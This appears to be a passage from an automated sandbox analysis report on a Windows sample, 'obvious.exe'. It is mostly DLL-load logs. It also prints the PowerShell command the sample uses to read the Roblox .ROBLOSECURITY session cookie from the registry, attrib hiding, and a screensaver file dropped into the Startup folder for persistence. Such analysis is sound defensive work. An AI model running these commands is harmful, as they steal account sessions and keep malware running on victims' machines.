                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\obvious.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: obvious.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: obvious.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: obvious.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: obvious.exeStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAD00BD pushad ; iretd 0_2_00007FFD9BAD00C1
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA69E1 push edx; retf 0_2_00007FFD9BCA73AB
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA6E43 push edx; retf 0_2_00007FFD9BCA73AB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B98D2A5 pushad ; iretd 5_2_00007FFD9B98D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9BAA8ACC push edx; iretd 5_2_00007FFD9BAA8AEA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9BAA8ABC push eax; iretd 5_2_00007FFD9BAA8ACA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9BB72316 push 8B485F94h; iretd 5_2_00007FFD9BB7231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BAB19BA pushad ; ret 8_2_00007FFD9BAB19C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BB81532 pushad ; ret 10_2_00007FFD9BB81551
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9BAC25F4 push cs; retf 15_2_00007FFD9BAC2662
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9BAC285A pushad ; retf 15_2_00007FFD9BAC2882
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9BAC34FA pushfd ; retf 15_2_00007FFD9BAC3512
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9BAC28AC pushad ; retf 15_2_00007FFD9BAC28C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC2604 push cs; retf 23_2_00007FFD9BAC2672
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC276C push esi; retf 23_2_00007FFD9BAC2862
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC276C pushad ; retf 23_2_00007FFD9BAC2892
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC27A4 pushad ; retf 23_2_00007FFD9BAC2892
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC34FA pushfd ; retf 23_2_00007FFD9BAC3522
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAC28D3 pushad ; retf 23_2_00007FFD9BAC28D9

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJump to dropped file
                        Uses attrib.exe to hide files
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJump to dropped file
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scrJump to dropped file
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scrJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scrJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr\:Zone.Identifier:$DATAJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
